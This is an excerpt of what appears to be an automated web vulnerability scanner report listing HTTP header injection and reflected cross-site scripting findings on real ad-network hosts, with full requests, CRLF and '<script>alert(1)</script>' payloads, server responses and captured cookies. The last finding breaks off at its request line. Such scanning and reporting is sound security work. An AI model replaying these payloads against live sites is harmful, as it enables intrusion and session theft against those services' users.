4.39. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-406/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload d2e76%0d%0a247d47d2a9 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-406/c5/jsc/fm.js?c=5344/1032/1&a=0&f=&n=305&r=13&d=15&q=&$=d2e76%0d%0a247d47d2a9&s=510&z=0.3061985722742975 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://blog.zap2it.com/pop2it/2011/05/cannes-film-festival-uma-thurman-jude-law-salma-hayek-and-more-kick-things-off.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#945899|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1; PI=h478907Za945899Zc305004479,305004479Zs1128Zt1130; FFCap=1581B1219,212244:1452,206974:1432,193317,193139,206002|0,1,1:0,9,1:2,10,1:1,10,1:0,10,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:d2e76
247d47d2a9
;expires=Thu, 12 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,5344,15;expires=Thu, 12 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 12 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#945899,5344#940496|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1:0,19,1;expires=Fri, 10 Jun 2011 14:55:57 GMT;path=/;domain=.zedo.com;
ETag: "867f4fde-838c-4a1e244fdb0c0"
Vary: Accept-Encoding
X-Varnish: 545954245 545953947
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=386
Expires: Wed, 11 May 2011 15:02:23 GMT
Date: Wed, 11 May 2011 14:55:57 GMT
Connection: close
Content-Length: 7308

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=510;var zzPat=',d2e76

...[SNIP]...

4.40. http://c7.zedo.com/utils/ecSet.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 4e804%0d%0af22f49a1fc0 was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=4e804%0d%0af22f49a1fc0&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://blog.zap2it.com/pop2it/2011/05/cannes-film-festival-uma-thurman-jude-law-salma-hayek-and-more-kick-things-off.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; PI=h478907Za945899Zc305004479,305004479Zs1128Zt1130; FFCap=1581B1219,212244:1452,206974:1432,193317,193139,206002|0,1,1:0,9,1:2,10,1:1,10,1:0,10,1; ZCBC=1; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#945899,5344#945899|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1:0,19,1; FFcat=305,5344,15; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 4e804
f22f49a1fc0
;expires=Fri, 10 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=776
Date: Wed, 11 May 2011 14:55:49 GMT
Connection: close



4.41. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/22NAU6HRG5G2PGRKDKJIVI [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/22NAU6HRG5G2PGRKDKJIVI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4b79b%0d%0aaa9a10bcb35 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/4b79b%0d%0aaa9a10bcb35/SDUW4IOBWFCKJBD7TJN7TI/22NAU6HRG5G2PGRKDKJIVI?pv=42511511826.887726&cookie=&width=300&height=250&x=0&y=0&keyw=&site_url=http://4770.anonymous.google&cpm=g)))TcqlvgANzLoK2jCMzFsui6yzraqQqyOfHG37VA HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Wed, 11 May 2011 16:03:13 GMT
Connection: keep-alive
Set-Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/4b79b
aa9a10bcb35
/SDUW4IOBWFCKJBD7TJN7TI/06a42aef022da2d7607cb836f41051af.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


4.42. http://www22.glam.com/cTagsImgCmd.act [gname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The value of the gname request parameter is copied into the Set-Cookie response header. The payload 308eb%0d%0a869869b8828 was submitted in the gname parameter. This caused a response containing an injected HTTP header.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=308eb%0d%0a869869b8828&gvalue=D,T,1644,5606,3726,2951,2705,2695,2694,2690,1771 HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://www.shefinds.com/2011/cannes-film-festival-begins-today-time-to-reflect-on-last-years-best-dressed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1304359345.1304361407.4; ctags=%3bct%3dbarhp; bkpix2=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^624c8ac7fbb041fd06d542d012ed1a61^116391130334874196611^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^293513051263372695^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^308eb
Set-Cookie: 308eb
869869b8828
=D,T,1644,5606,3726,2951,2705,2695,2694,2690,1771; expires=Fri, 13 May 2011 15: 05:37 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=132
Date: Wed, 11 May 2011 15:05:37 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

5. Cross-site scripting (reflected)  previous
There are 402 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fb331<script>alert(1)</script>4cd38e9ddde was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480fb331<script>alert(1)</script>4cd38e9ddde&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:23 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480fb331<script>alert(1)</script>4cd38e9ddde-SM=adver_05-11-2011-15-14-23; expires=Sat, 14-May-2011 15:14:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480fb331<script>alert(1)</script>4cd38e9ddde-VT=adver_05-11-2011-15-14-23_8788446831305126863; expires=Mon, 09-May-2016 15:14:23 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480fb331<script>alert(1)</script>4cd38e9ddde-nUID=adver_8788446831305126863; expires=Wed, 11-May-2011 15:29:23 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480fb331<script>alert(1)</script>4cd38e9ddde';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='8788446831305126863';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='
...[SNIP]...

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 48f1c<script>alert(1)</script>23687cc4e4f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver48f1c<script>alert(1)</script>23687cc4e4f&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:14:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547ZZZZadver48f1c%3Cscript%3Ealert%281%29%3C%2Fscript%3E23687cc4e4f_05-11-2011-15-14-14_9050736521305126854; expires=Mon, 09-May-2016 15:14:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver48f1c%3Cscript%3Ealert%281%29%3C%2Fscript%3E23687cc4e4f_9050736521305126854; expires=Wed, 11-May-2011 15:29:14 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver48f1c<script>alert(1)</script>23687cc4e4f';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='905073652130512
...[SNIP]...

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86c97<script>alert(1)</script>23c4a47d7b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/86c97<script>alert(1)</script>23c4a47d7b8&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:19:38 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:19:38 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-15-19-38_18329269271305127178; expires=Mon, 09-May-2016 15:19:38 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_18329269271305127178; expires=Wed, 11-May-2011 15:34:38 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='18329269271305127178';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/86c97<script>alert(1)</script>23c4a47d7b8';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 6e217<script>alert(1)</script>fdb7b7f3c24 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=6e217<script>alert(1)</script>fdb7b7f3c24&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:15:48 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:15:48 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-15-15-48_680058941305126948; expires=Mon, 09-May-2016 15:15:48 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_680058941305126948; expires=Wed, 11-May-2011 15:30:48 GMT; path=/; domain=c3metrics.com
Content-Length: 6697
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
4572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='680058941305126948';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='6e217<script>alert(1)</script>fdb7b7f3c24';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload d4972<script>alert(1)</script>ab5297d081c was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72d4972<script>alert(1)</script>ab5297d081c&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:15:18 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:15:18 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-15-15-18_12132052941305126918; expires=Mon, 09-May-2016 15:15:18 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_12132052941305126918; expires=Wed, 11-May-2011 15:30:18 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
his.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12132052941305126918';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72d4972<script>alert(1)</script>ab5297d081c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 626e5<script>alert(1)</script>369e577d9c6 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

